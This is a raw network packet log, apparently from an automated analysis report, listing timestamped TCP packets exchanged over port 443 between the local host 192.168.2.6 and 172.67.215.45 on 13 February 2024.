                                                                  Feb 13, 2024 21:13:54.537368059 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.537403107 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.539030075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.539045095 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.539104939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.539112091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.539148092 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.541593075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.541605949 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.541652918 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.541660070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.541701078 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.543329000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.543344975 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.543387890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.543395042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.543417931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.543430090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.545814991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.545830011 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.545880079 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.545888901 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.545902967 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.545928955 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.547485113 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.547498941 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.547553062 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.547559977 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.547612906 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.610047102 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.610074997 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.610124111 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.610138893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.610156059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.610176086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.611674070 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.611702919 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.611742973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.611749887 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.611773014 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.611794949 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.613665104 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.613682985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.613730907 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.613746881 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.613782883 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.615391970 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.615408897 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.615457058 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.615463018 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.615487099 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.615561962 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.617784023 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.617798090 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.617835045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.617841959 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.617868900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.617894888 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.620718002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.620733023 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.620771885 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.620778084 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.620817900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.620831966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.622030020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.622044086 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.622092962 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.622098923 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.622108936 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.622142076 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.624527931 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.624551058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.624593973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.624599934 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.624629974 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.624650002 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.626208067 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.626224041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.626286983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.626286983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.626295090 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.626482010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.628768921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.628783941 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.628840923 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.628848076 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.628864050 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.629031897 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.630505085 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.630527973 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.630603075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.630603075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.630610943 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.630738020 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.632867098 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.632889986 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.632998943 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.633007050 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.633357048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.634633064 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.634655952 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.634730101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.634730101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.634737968 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.634776115 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.637096882 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.637113094 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.637156963 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.637164116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.637214899 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.637214899 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.638695002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.638710022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.638746023 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.638752937 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.638797045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.638797998 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.641328096 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.641354084 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.641433954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.641433954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.641444921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.641530037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.643078089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.643095016 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.643141985 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.643161058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.643233061 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.643233061 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.645441055 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.645457029 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.645510912 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.645530939 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.645564079 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.645564079 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.647171021 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.647188902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.647243023 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.647265911 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.647486925 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.649573088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.649599075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.649660110 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.649681091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.649715900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.649715900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.651483059 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.651499987 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.651552916 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.651571989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.653893948 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.653917074 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.653939962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.653995991 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.654006004 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.656275988 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.656300068 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.656337976 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.656337976 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.656349897 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.656400919 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.656400919 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.658246994 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.658262014 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.658317089 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.658337116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.658469915 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.660150051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.660165071 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.660237074 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.660237074 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.660245895 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.660279989 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.662153006 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.662167072 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.662216902 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.662233114 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.663285017 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.663829088 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.663846970 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.663891077 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.663897991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.663948059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.663953066 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.664061069 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.665469885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.665487051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.665545940 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.665551901 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.665595055 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.667227983 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.667246103 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.667284966 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.667290926 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.667323112 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.667488098 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.668735981 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.668751001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.668930054 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.668930054 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.668956041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.669050932 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.670420885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.670438051 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.670486927 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.670495033 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.670605898 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.671395063 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.671411991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.671482086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.671482086 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.671489954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.671534061 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.673141956 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.673160076 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.673228979 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.673228979 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.673235893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.673280954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.674824953 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.674841881 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.675844908 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.675853014 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.675967932 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.676670074 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.676686049 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.676748037 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.676755905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.676799059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.677640915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.677660942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.677726030 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.677726984 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.677733898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.677772045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.679415941 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.679434061 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.679506063 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.679506063 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.679512978 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.679573059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.681121111 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.681137085 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.681878090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.681890011 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.681958914 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.682811022 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.682826996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.682929039 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.682936907 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.683603048 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.684636116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.684650898 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.684735060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.684741974 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.685631037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.685640097 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.685647011 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.685709000 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.685782909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.685782909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.685790062 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.685833931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.687401056 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.687428951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.687489033 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.687498093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.687508106 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.687537909 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.689117908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.689135075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.689199924 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.689199924 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.689205885 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.689352989 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.690732002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.690747976 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.690805912 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.690813065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.692478895 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.692497969 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.692507029 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.692512989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.692559958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.692559958 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.693703890 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.693720102 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.693873882 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.693881989 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.693933010 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.695355892 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.695370913 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.695436001 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.695436001 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.695444107 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.695585012 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.697081089 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.697097063 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.697165012 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.697165012 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.697173119 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.697216034 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.698733091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.698753119 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.698801994 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.698808908 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.698852062 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.698852062 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.699870110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.699887037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.699954033 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.699954033 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.699959993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.700004101 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.701554060 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.701570988 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.701617002 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.701622963 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.701668024 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.701668024 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.703267097 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.703286886 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.703356028 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.703356028 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.703362942 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.703435898 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.705024004 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.705044985 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.705116987 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.705116987 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.705125093 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:54.705214024 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:54.706640005 CET44349701172.67.215.45192.168.2.6
